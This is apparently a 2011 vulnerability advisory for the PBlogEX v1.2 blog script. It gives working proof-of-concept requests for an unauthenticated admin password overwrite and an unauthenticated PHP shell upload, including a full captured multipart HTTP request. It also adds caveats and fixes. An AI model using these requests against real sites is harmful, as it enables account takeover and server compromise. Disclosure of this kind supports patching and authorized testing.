# PBlogEX v1.2 Multiple Vulnerabilities
# vendor: http://www.twelvedev.com/
# By l3lack_lord
# WwW.Mokhareb.NeT
# Demo: http://f-ochoa.com/
# Tested On: Apache/2.2.9 - PHP/5.2.6
# Date: 2011/03/4
#
# Description:
# The admin password-change script (admin/admin.password.php) performs no
# authentication or authorization check before it executes: an
# unauthenticated POST overwrites the stored password of the requested user.
#
# POC:
# http://Site.com/PBlogEX/admin/admin.password.php
# [POST] user=1&password=l3lack_lord
# The password of user 1 is now l3lack_lord; log in at
# http://Site.com/PBlogEX/admin
# Only the password is set by this request -- you still have to guess (or
# otherwise learn) the admin username. user=1 is presumably the ID of the
# first/admin account; verify against the target. This POC is destructive
# (it replaces the live password), so run it only against systems you are
# authorized to test. The fix is to require an authenticated admin session
# (and a CSRF token) before the password is updated.
#################################################################
# Description:
# Unauthenticated remote shell upload via admin/image.upload.php: the script
# accepts uploads with no authentication check and keeps the client-supplied
# extension, so a file named p.jpg.php is stored with a .php suffix in the
# web-accessible images/ directory, where it is reachable as a PHP script.
#
# POC:
# http://Site.com/PBlogEX/admin/image.upload.php
# [POST]
Host: localhost
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.10) Gecko/20100914 Firefox/3.6.10
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://Site.com/PBlogEX/admin/admin.php
Content-Type: multipart/form-data; boundary=---------------------------225932708016080
Content-Length: 5775
# (Content-Length must be recomputed if the body below is changed. The
# "filephoto" part is empty in this capture -- the PHP payload goes between
# its blank line and the next boundary.)
-----------------------------225932708016080\r\n
Content-Disposition: form-data; name="filephoto"; filename="p.jpg.php"\r\n
Content-Type: image/jpeg\r\n
\r\n
\r\n
-----------------------------225932708016080\r\n
Content-Disposition: form-data; name="titlephoto"\r\n
\r\n
aaa\r\n
-----------------------------225932708016080\r\n
Content-Disposition: form-data; name="descphoto"\r\n
\r\n
aaa\r\n
-----------------------------225932708016080\r\n
Content-Disposition: form-data; name="Default1"\r\n
\r\n
on\r\n
-----------------------------225932708016080\r\n
Content-Disposition: form-data; name="0"\r\n
\r\n
f\r\n
-----------------------------225932708016080\r\n
Content-Disposition: form-data; name="1"\r\n
\r\n
i\r\n
-----------------------------225932708016080\r\n
Content-Disposition: form-data; name="2"\r\n
\r\n
l\r\n
-----------------------------225932708016080\r\n
Content-Disposition: form-data; name="3"\r\n
\r\n
e\r\n
-----------------------------225932708016080\r\n
Content-Disposition: form-data; name="4"\r\n
\r\n
p\r\n
-----------------------------225932708016080\r\n
Content-Disposition: form-data; name="5"\r\n
\r\n
h\r\n
-----------------------------225932708016080\r\n
Content-Disposition: form-data; name="6"\r\n
\r\n
o\r\n
-----------------------------225932708016080\r\n
Content-Disposition: form-data; name="7"\r\n
\r\n
t\r\n
-----------------------------225932708016080\r\n
Content-Disposition: form-data; name="8"\r\n
\r\n
o\r\n
-----------------------------225932708016080\r\n
Content-Disposition: form-data; name="9"\r\n
\r\n
=\r\n
-----------------------------225932708016080\r\n
Content-Disposition: form-data; name="10"\r\n
\r\n
p\r\n
-----------------------------225932708016080\r\n
Content-Disposition: form-data; name="11"\r\n
\r\n
.\r\n
-----------------------------225932708016080\r\n
Content-Disposition: form-data; name="12"\r\n
\r\n
j\r\n
-----------------------------225932708016080\r\n
Content-Disposition: form-data; name="13"\r\n
\r\n
p\r\n
-----------------------------225932708016080\r\n
Content-Disposition: form-data; name="14"\r\n
\r\n
g\r\n
-----------------------------225932708016080\r\n
Content-Disposition: form-data; name="15"\r\n
\r\n
&\r\n
-----------------------------225932708016080\r\n
Content-Disposition: form-data; name="16"\r\n
\r\n
t\r\n
-----------------------------225932708016080\r\n
Content-Disposition: form-data; name="17"\r\n
\r\n
i\r\n
-----------------------------225932708016080\r\n
Content-Disposition: form-data; name="18"\r\n
\r\n
t\r\n
-----------------------------225932708016080\r\n
Content-Disposition: form-data; name="19"\r\n
\r\n
l\r\n
-----------------------------225932708016080\r\n
Content-Disposition: form-data; name="20"\r\n
\r\n
e\r\n
-----------------------------225932708016080\r\n
Content-Disposition: form-data; name="21"\r\n
\r\n
p\r\n
-----------------------------225932708016080\r\n
Content-Disposition: form-data; name="22"\r\n
\r\n
h\r\n
-----------------------------225932708016080\r\n
Content-Disposition: form-data; name="23"\r\n
\r\n
o\r\n
-----------------------------225932708016080\r\n
Content-Disposition: form-data; name="24"\r\n
\r\n
t\r\n
-----------------------------225932708016080\r\n
Content-Disposition: form-data; name="25"\r\n
\r\n
o\r\n
-----------------------------225932708016080\r\n
Content-Disposition: form-data; name="26"\r\n
\r\n
=\r\n
-----------------------------225932708016080\r\n
Content-Disposition: form-data; name="27"\r\n
\r\n
a\r\n
-----------------------------225932708016080\r\n
Content-Disposition: form-data; name="28"\r\n
\r\n
a\r\n
-----------------------------225932708016080\r\n
Content-Disposition: form-data; name="29"\r\n
\r\n
a\r\n
-----------------------------225932708016080\r\n
Content-Disposition: form-data; name="30"\r\n
\r\n
&\r\n
-----------------------------225932708016080\r\n
Content-Disposition: form-data; name="31"\r\n
\r\n
d\r\n
-----------------------------225932708016080\r\n
Content-Disposition: form-data; name="32"\r\n
\r\n
e\r\n
-----------------------------225932708016080\r\n
Content-Disposition: form-data; name="33"\r\n
\r\n
s\r\n
-----------------------------225932708016080\r\n
Content-Disposition: form-data; name="34"\r\n
\r\n
c\r\n
-----------------------------225932708016080\r\n
Content-Disposition: form-data; name="35"\r\n
\r\n
p\r\n
-----------------------------225932708016080\r\n
Content-Disposition: form-data; name="36"\r\n
\r\n
h\r\n
-----------------------------225932708016080\r\n
Content-Disposition: form-data; name="37"\r\n
\r\n
o\r\n
-----------------------------225932708016080\r\n
Content-Disposition: form-data; name="38"\r\n
\r\n
t\r\n
-----------------------------225932708016080\r\n
Content-Disposition: form-data; name="39"\r\n
\r\n
o\r\n
-----------------------------225932708016080\r\n
Content-Disposition: form-data; name="40"\r\n
\r\n
=\r\n
-----------------------------225932708016080\r\n
Content-Disposition: form-data; name="41"\r\n
\r\n
a\r\n
-----------------------------225932708016080\r\n
Content-Disposition: form-data; name="42"\r\n
\r\n
a\r\n
-----------------------------225932708016080\r\n
Content-Disposition: form-data; name="43"\r\n
\r\n
a\r\n
-----------------------------225932708016080\r\n
Content-Disposition: form-data; name="44"\r\n
\r\n
&\r\n
-----------------------------225932708016080\r\n
Content-Disposition: form-data; name="45"\r\n
\r\n
D\r\n
-----------------------------225932708016080\r\n
Content-Disposition: form-data; name="46"\r\n
\r\n
e\r\n
-----------------------------225932708016080\r\n
Content-Disposition: form-data; name="47"\r\n
\r\n
f\r\n
-----------------------------225932708016080\r\n
Content-Disposition: form-data; name="48"\r\n
\r\n
a\r\n
-----------------------------225932708016080\r\n
Content-Disposition: form-data; name="49"\r\n
\r\n
u\r\n
-----------------------------225932708016080\r\n
Content-Disposition: form-data; name="50"\r\n
\r\n
l\r\n
-----------------------------225932708016080\r\n
Content-Disposition: form-data; name="51"\r\n
\r\n
t\r\n
-----------------------------225932708016080\r\n
Content-Disposition: form-data; name="52"\r\n
\r\n
1\r\n
-----------------------------225932708016080\r\n
Content-Disposition: form-data; name="53"\r\n
\r\n
=\r\n
-----------------------------225932708016080\r\n
Content-Disposition: form-data; name="54"\r\n
\r\n
o\r\n
-----------------------------225932708016080\r\n
Content-Disposition: form-data; name="55"\r\n
\r\n
n\r\n
-----------------------------225932708016080--\r\n

# The response (an error message, in the author's test) prints the name under
# which the file was stored, e.g. 2011-03-02_7032_p.jpg.php: the upload date,
# a numeric value whose origin is not shown here, and the original file name.
# Copy that name from the response -- it is not otherwise predictable from the
# request. The server-side rename keeps the client-supplied .php suffix, so
# it does not neutralize the extension.
# Shell Path : http://Site.com/PBlogEX/images/2011-03-02_7032_p.jpg.php
#
# Note: the parts named "0" through "55" above spell out
# filephoto=p.jpg&titlephoto=aaa&descphoto=aaa&Default1=on one character per
# part. This looks like an artifact of how the request was captured rather
# than something the script requires -- confirm against image.upload.php
# before relying on it.
#
# Fix: reject the upload unless an authenticated admin session exists, check
# the extension against an allowlist (and the content against the declared
# image type), and store uploads under a server-generated name in a directory
# where the web server does not execute scripts.
#
# Virangar Security Team , DeltaHacking TEam , Aria-Security
# tnX t0 mY cronies Hares And Netw0rm :-*